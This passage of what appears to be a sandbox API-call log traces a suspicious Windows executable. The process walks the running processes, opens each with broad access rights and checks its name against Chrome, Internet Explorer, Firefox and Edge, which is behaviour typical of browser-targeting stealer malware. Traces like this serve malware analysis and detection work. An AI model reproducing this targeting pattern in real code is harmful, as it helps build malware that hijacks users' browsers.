	[0216.055] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0216.057] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0216.057] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x46e4
	[0216.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.058] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.058] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.058] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0216.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.058] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.059] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0216.059] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x46e8
	[0216.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.059] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.060] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.060] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0216.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.061] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.061] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0216.062] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x46ec
	[0216.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.062] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0216.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.062] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.063] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0216.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.063] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.063] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0216.064] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x46f0
	[0216.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.064] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.065] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.065] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0216.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.065] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.065] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0216.066] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x46f4
	[0216.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.066] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0216.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.066] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.067] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0216.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.067] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.067] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0216.068] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x46f8
	[0216.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.068] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0216.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.069] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.069] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0216.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.069] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.069] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0216.070] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x46fc
	[0216.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.070] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0216.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.070] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.071] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0216.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.071] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.071] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0216.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4700
	[0216.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.072] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0216.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.072] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.073] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0216.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.073] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.073] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.074] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x4704
	[0216.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.074] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.074] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.074] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.075] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.075] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.076] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4708
	[0216.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.076] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.077] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.077] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.077] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.077] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.078] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x470c
	[0216.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.078] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.079] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.079] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.079] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.080] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.080] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4710
	[0216.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.080] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.081] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.081] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.081] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.082] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.082] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x4714
	[0216.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.082] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.083] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.083] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.083] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.083] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.084] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x4718
	[0216.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.084] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.085] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.085] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.085] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.085] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.086] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x471c
	[0216.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.086] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.087] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.087] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.087] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.087] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0216.088] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4720
	[0216.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.088] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0216.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.089] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.089] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0216.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.089] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.089] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.090] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x4724
	[0216.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.090] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.091] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.091] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.091] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.091] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0216.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x4728
	[0216.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.092] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.093] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.093] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.093] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.094] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0216.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x472c
	[0216.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.094] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0216.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.095] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.095] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0216.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.095] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.095] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.096] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4730
	[0216.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.096] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.097] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.097] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.097] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.097] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0216.098] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x4734
	[0216.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.098] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0216.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.099] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.099] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0216.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.099] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.100] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0216.100] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4738
	[0216.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.100] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0216.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.101] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.101] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0216.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.101] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.101] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0216.102] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x473c
	[0216.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.102] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0216.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.103] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.103] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0216.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.103] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.103] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0216.104] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x4740
	[0216.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.104] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0216.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.104] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.105] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0216.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.105] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.105] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0216.106] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0216.106] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0216.107] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x4744
